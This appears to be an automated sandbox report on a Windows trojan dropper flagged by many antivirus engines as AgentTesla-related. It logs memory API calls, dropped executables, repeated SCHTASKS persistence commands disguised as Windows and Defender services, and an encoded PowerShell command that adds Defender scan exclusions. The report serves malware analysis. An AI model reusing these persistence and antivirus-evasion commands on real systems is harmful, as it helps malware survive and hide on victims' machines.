NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0066b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00616000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0061a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00617000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0060a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f882000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02960000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e151000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0252a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e152000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02522000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02532000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02533000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02534000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02627000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0252b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02625000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02535000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02536000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:51 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\ProgramStarter.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (16 events)

cmdline	SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk487" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk469" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk263" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk201" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk351" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\ProgramStarter.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\ProgramStarter.exe

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 20, 2023, 9:51 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (15 events)

cmdline	SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk487" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk469" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk263" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk201" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk351" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f

Installs itself for autorun at Windows startup (15 events)

cmdline	SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk487" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk469" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk263" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk201" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk351" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 45 AntiVirus engines on VirusTotal as malicious (45 events)

Bkav	W32.AIDetectNet.01
Lionic	Trojan.Win32.Generic.4!c
MicroWorld-eScan	Gen:Variant.Lazy.286033
ALYac	Gen:Variant.Lazy.286033
VIPRE	Gen:Variant.Lazy.286033
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan ( 0059e74b1 )
Alibaba	Trojan:MSIL/AgentTesla.c68bd3c3
K7GW	Trojan ( 0059e74b1 )
CrowdStrike	win/malicious_confidence_100% (W)
Arcabit	Trojan.Lazy.D45D51
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of MSIL/TrojanDropper.Agent.FTT
APEX	Malicious
Paloalto	generic.ml
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan.MSIL.Crypt.gen
BitDefender	Gen:Variant.Lazy.286033
Avast	Win32:Trojan-gen
Tencent	Msil.Trojan.Crypt.Akjl
Emsisoft	Gen:Variant.Lazy.286033 (B)
DrWeb	Trojan.DownLoader45.49466
TrendMicro	TROJ_GEN.R002C0DCJ23
McAfee-GW-Edition	Artemis!Trojan
FireEye	Generic.mg.1b664f2a0bede6c4
Sophos	ML/PE-A
Webroot	W32.Trojan.Gen
Avira	HEUR/AGEN.1255529
MAX	malware (ai score=80)
Microsoft	Trojan:MSIL/AgentTesla.JZ!MTB
ZoneAlarm	HEUR:Trojan.MSIL.Crypt.gen
GData	Gen:Variant.Lazy.286033
Google	Detected
AhnLab-V3	Malware/Win.Generic.C5397276
Acronis	suspicious
McAfee	Artemis!1B664F2A0BED
VBA32	CIL.HeapOverride.Heur
Cylance	unsafe
TrendMicro-HouseCall	TROJ_GEN.R002C0DCJ23
Rising	Dropper.Agent!8.2F (CLOUD)
Fortinet	MSIL/Agent.FTT!tr
BitDefenderTheta	Gen:NN.ZemsilCO.36344.so0@aSEYpzi
AVG	Win32:Trojan-gen
Panda	Trj/GdSda.A

FixDefError.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All